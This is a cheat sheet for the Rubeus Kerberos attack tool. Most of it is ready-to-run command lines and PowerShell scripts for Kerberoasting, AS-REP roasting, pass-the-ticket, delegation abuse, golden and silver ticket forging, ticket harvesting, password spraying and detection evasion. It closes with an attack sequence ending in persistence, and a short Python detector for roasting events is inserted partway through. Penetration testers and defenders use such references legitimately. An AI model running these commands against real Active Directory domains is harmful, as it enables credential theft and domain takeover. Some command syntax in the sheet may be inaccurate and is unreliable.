# Rubeus Kerberos Interaction Tool Cheat Sheet
## Overview
Rubeus is a C# toolset for raw Kerberos interaction and abuse. It is designed for attacking Kerberos implementations and includes functionality for ticket requests, renewals, and various Kerberos-based attacks. Rubeus is particularly useful for Active Directory penetration tests and red team operations.
**Warning**: This tool is intended only for authorized penetration testing and security assessments. Make sure you have proper authorization before using it in any environment.
## Installation
### Precompiled Binary
```powershell
# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"
# Verify download (compare against the hash published with the release)
Get-FileHash Rubeus.exe -Algorithm SHA256
```
### Compile from Source
```powershell
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"
# Output will be in Rubeus/bin/Release/
```
### Alternative Download Methods
```powershell
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output
# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe
```
## Basic Usage
### Command Structure
```cmd
# Basic syntax
Rubeus.exe [command] [options]
# Get help
Rubeus.exe help
# Get help for specific command
Rubeus.exe [command] /help
```
### Available Commands
|Command|Description|
|---------|-------------|
|`asktgt`|Request a TGT (Ticket Granting Ticket)|
|`asktgs`|Request a TGS (Ticket Granting Service)|
|`askticket`|Request a ticket for a specific service|
|`renew`|Renew a ticket|
|`s4u`|Perform S4U (Service for User) attacks|
|`ptt`|Pass-the-ticket attacks|
|`purge`|Purge tickets from memory|
|`describe`|Describe ticket contents|
|`klist`|List current tickets|
|`dump`|Dump tickets from memory|
|`triage`|Triage tickets|
|`monitor`|Monitor for new tickets|
|`harvest`|Harvest tickets|
|`brute`|Brute force passwords|
|`kerberoast`|Kerberoasting attacks|
|`asreproast`|AS-REP roasting attacks|
## Ticket Requests and Management
### Request TGT (Ticket Granting Ticket)
```cmd
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com
# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com
# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com
# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com
```
### Request TGS (Ticket Granting Service)
```cmd
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com
# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com
# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com
# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256
```
### Ticket Management
```cmd
# List current tickets
Rubeus.exe klist
# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket
# Purge all tickets
Rubeus.exe purge
# Purge specific ticket
Rubeus.exe purge /luid:0x12345
# Dump tickets from memory
Rubeus.exe dump
# Dump tickets for specific user
Rubeus.exe dump /user:username
```
## Kerberoasting Attacks
### Basic Kerberoasting
```cmd
# Kerberoast all SPNs
Rubeus.exe kerberoast
# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount
# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4
# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
```
### Advanced Kerberoasting
```cmd
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"
# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com
# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com
# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise
```
### Targeted Kerberoasting
```cmd
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433
# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com
# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020
# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"
```
## AS-REP Roasting Attacks
### Basic AS-REP Roasting
```cmd
# AS-REP roast all users
Rubeus.exe asreproast
# AS-REP roast specific user
Rubeus.exe asreproast /user:username
# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt
# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat
```
### Advanced AS-REP Roasting
```cmd
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com
# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com
# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com
```
## Pass-the-Ticket (PTT) Attacks
### Basic Pass-the-Ticket
```cmd
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket
# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi
# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345
# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe
```
### Advanced PTT Techniques
```cmd
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi
# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com
# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe
```
## S4U (Service for User) Attacks
### S4U2Self Attacks
```cmd
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
```
### S4U2Proxy Attacks
```cmd
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap
# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
```
### Constrained Delegation Abuse
```cmd
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com
# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt
# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com
```
## Golden and Silver Ticket Attacks
### Golden Ticket Creation
```cmd
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...
# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520
```
### Silver Ticket Creation
```cmd
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com
```
## Ticket Harvesting and Monitoring
### Ticket Harvesting
```cmd
# Harvest tickets from all sessions
Rubeus.exe harvest
# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30
# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator
# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt
```
### Ticket Monitoring
```cmd
# Monitor for new tickets
Rubeus.exe monitor
# Monitor with specific interval
Rubeus.exe monitor /interval:60
# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount
# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt
```
### Ticket Triage
```cmd
# Triage all tickets
Rubeus.exe triage
# Triage tickets for specific user
Rubeus.exe triage /user:administrator
# Triage with LUID filter
Rubeus.exe triage /luid:0x12345
# Triage and show service tickets only
Rubeus.exe triage /service
```
## Password Attacks
### Password Spraying
```cmd
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket
# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket
# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket
# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket
```
### Credential Validation
```cmd
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials
# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials
# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials
```
## Advanced Techniques
### Cross-Domain Attacks
```cmd
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com
# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket
# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
```
### Unconstrained Delegation Abuse
```cmd
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5
# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap
# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt
```
### Resource-Based Constrained Delegation
```cmd
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt
# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
```
## Evasion Techniques
### OPSEC Considerations
```cmd
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256
# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000
# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com
# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com
```
### Stealth Operations
```cmd
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0
# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host
# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
```
## Integration with Other Tools
### Mimikatz Integration
```cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi
# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
```
### Impacket Integration
```bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
```
### Cobalt Strike Integration
```cmd
# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump
```
## Automation Scripts
### Comprehensive Kerberos Assessment
```powershell
# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage | Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump | Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"
```
### Automated Ticket Harvesting
```powershell
# Automated ticket harvesting script
param(
    [int]$Interval = 300,      # 5 minutes
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600      # 1 hour
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt $endTime) {
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $outputFile = "$OutputPath\harvest_${iteration}_$timestamp.txt"

    Write-Host "[+] Iteration $iteration - Harvesting tickets..."
    & Rubeus.exe harvest | Out-File $outputFile
    Write-Host "[+] Tickets saved to $outputFile"

    if ((Get-Date) -lt $endTime) {
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    }
    $iteration++
}

Write-Host "[+] Ticket harvesting complete"
```
### Domain Reconnaissance Script
```powershell
# Domain reconnaissance with Rubeus
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null
Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest | Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") {
    Write-Host "[+] Credentials valid, continuing reconnaissance..."
    # Kerberoasting with credentials
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"
    # AS-REP Roasting with credentials
    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"
    Write-Host "[+] Reconnaissance complete"
} else {
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
}
```
## Troubleshooting
### Common Issues
```cmd
# Clock skew issues
w32tm /resync
# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88
# Kerberos configuration
klist purge
klist
# DNS resolution (Kerberos SRV record)
nslookup -type=SRV _kerberos._tcp.domain.com
```
### Debug Mode
```cmd
# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1
# View Kerberos events (PowerShell; 4768/4769 are audit events in the Security log of the domain controller)
Get-WinEvent -LogName Security | Where-Object { $_.Id -eq 4768 -or $_.Id -eq 4769 }
# Check ticket cache
klist tickets
```
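The 4768/4769 events pulled by the `Get-WinEvent` line above are also what a defender uses to spot the kerberoast and asreproast requests listed earlier in this sheet. As an added example that is not part of the original page or of Rubeus, the following Python flags the two classic indicators in constructed event records: RC4 (etype 0x17) service-ticket requests from one client for several services (Kerberoasting) and TGTs issued with PreAuthType 0 (AS-REP roasting). The sample records, the `min_services` threshold and the field names are assumptions modelled on the Windows Security event schema.

```python
"""Flag Kerberos ticket requests matching Kerberoast and AS-REP roast patterns.
Added example, not Rubeus code: records are constructed in the shape of the
EventData fields of Security events 4768/4769 (Get-WinEvent or SIEM export)."""

RC4_HMAC = "0x17"   # etype 23; what a 'kerberoast /enctype:rc4' request downgrades to
NO_PREAUTH = "0"    # PreAuthType 0: TGT issued without pre-authentication (asreproast)
SUCCESS = "0x0"

# Constructed sample records. In 4769, ServiceName is the service account, not the SPN.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jsmith@DOMAIN.COM", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jsmith@DOMAIN.COM", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jsmith@DOMAIN.COM", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.COM", "ServiceName": "FS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.COM", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.7", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.0.0.9", "Status": "0x0"},
]

def is_kerberoast_candidate(ev):
    """Successful 4769 for a non-krbtgt service, ticket encrypted with RC4."""
    return (ev["EventID"] == 4769 and ev["Status"] == SUCCESS
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not ev["ServiceName"].lower().startswith("krbtgt"))

def is_asrep_roast_candidate(ev):
    """Successful 4768 where the KDC accepted the AS-REQ without pre-authentication."""
    return (ev["EventID"] == 4768 and ev["Status"] == SUCCESS
            and ev.get("PreAuthType") == NO_PREAUTH)

def find_roasting(events, min_services=3):
    """Return (kerberoast_sources, asrep_accounts): (user, client IP) -> number of
    distinct service accounts it pulled RC4 tickets for, kept at/above min_services
    (many RC4 service tickets from one client is the Kerberoast pattern; a single one
    may be a legacy host), and the set of accounts that got a TGT without pre-auth."""
    per_source = {}
    for ev in events:
        if is_kerberoast_candidate(ev):
            per_source.setdefault((ev["TargetUserName"], ev["IpAddress"]), set()).add(ev["ServiceName"])
    kerberoast = {src: len(s) for src, s in per_source.items() if len(s) >= min_services}
    asrep = {ev["TargetUserName"] for ev in events if is_asrep_roast_candidate(ev)}
    return kerberoast, asrep

if __name__ == "__main__":
    roast, asrep = find_roasting(SAMPLE_EVENTS)
    print("Kerberoast sources:", roast)     # {('jsmith@DOMAIN.COM', '10.0.0.5'): 3}
    print("AS-REP roast accounts:", asrep)  # {'svc_legacy'}
```

In an AES-only domain the RC4 check alone is a strong signal; where legacy RC4 clients remain, the per-client service count is what separates a roasting run from normal traffic.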
### Error Resolution
|Error|Resolution|
|---------|-------------|
|`KDC_ERR_PREAUTH_FAILED`|Check username/password, account lockout|
|`KDC_ERR_C_PRINCIPAL_UNKNOWN`|Verify username format and domain|
|`KDC_ERR_S_PRINCIPAL_UNKNOWN`|Check SPN existence and format|
|`KRB_AP_ERR_SKEW`|Synchronize time with domain controller|
## Best Practices
### Operational Security
- **Use legitimate accounts**: Avoid suspicious service accounts where possible
- **Limit requests**: Do not flood the domain controller with requests
- **Time synchronization**: Make sure the clock is synchronized correctly to avoid clock skew
- **Clean up**: Remove injected tickets after operations
- **Monitor logs**: Be aware of the security events generated
### Attack Strategy
```cmd
# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist
# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats
# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin
# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com
```
## Resources
- [Rubeus GitHub Repository](https://github.com/GhostPack/Rubeus)
- Kerberos Protocol Documentation
- Active Directory Security
- Harmj0y's Blog
- SpecterOps Blog

---
*This cheat sheet provides a comprehensive reference for using Rubeus. Always make sure you have proper authorization before conducting Active Directory security assessments.*